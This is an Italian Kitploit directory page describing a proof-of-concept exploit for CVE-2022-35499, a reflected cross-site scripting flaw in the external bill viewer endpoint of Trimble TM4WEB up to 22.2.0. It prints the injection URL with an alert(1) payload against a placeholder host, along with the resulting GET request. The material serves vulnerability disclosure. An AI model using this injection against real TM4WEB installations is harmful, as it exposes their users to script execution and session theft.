Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-35499 — Exploit proof-of-concept per la vulnerabilità di cross-site scripting riflesso (XSS) in Trimble TM4WEB <=22.2.0, che dimostra l'iniezione tramite parametri URL arbitrari nell'endpoint del visualizzatore di fatture esterno. | Kitploit
Strumenti/GitHubGitHub/pn-tester/cve-2022-35499
Scanner di Vulnerabilità WebAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubpn-tester/cve-2022-35499

CVE-2022-35499

Exploit proof-of-concept per la vulnerabilità di cross-site scripting riflesso (XSS) in Trimble TM4WEB <=22.2.0, che dimostra l'iniezione tramite parametri URL arbitrari nell'endpoint del visualizzatore di fatture esterno.

Vedi Repository
41 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

In Trimble TM4WEB <=22.2.0 l'endpoint external bill viewer è vulnerabile a cross-site scripting riflesso tramite iniezione in un parametro arbitrario aggiunto all'URL.

Passo 1 :

Il seguente URL di esempio attiverà la vulnerabilità ed eseguirà la funzione javascript alert() mostrando il numero 1 come prova di concetto. Questa vulnerabilità funziona su ogni installazione TM4WEB osservata finora dal ricercatore. esempio di url malevolo che utilizza un sito inesistente:

https://example-tm4web.com/trace/external_bill_viewer.msw?foo=bar"}%27);alert(1);<!--

Questo URL attiva la seguente richiesta GET malevola.

GET /trace/external_bill_viewer.msw?foo=bar%22}%27);alert(1);%3C!-- HTTP/1.1
Host: example-tm4web.com
Connection: close

Questa richiesta sfrutta un parametro arbitrario dell'endpoint vulnerabile external_bill_viewer.msw.

L'attacco provoca un'iniezione di codice javascript valida nella riga 84 della risposta HTTP, come mostrato nello screenshot seguente :

injection

L'esempio di iniezione è mostrato di seguito con la conseguente esecuzione JavaScript del payload alert(1) :

xss

Scarica lo strumento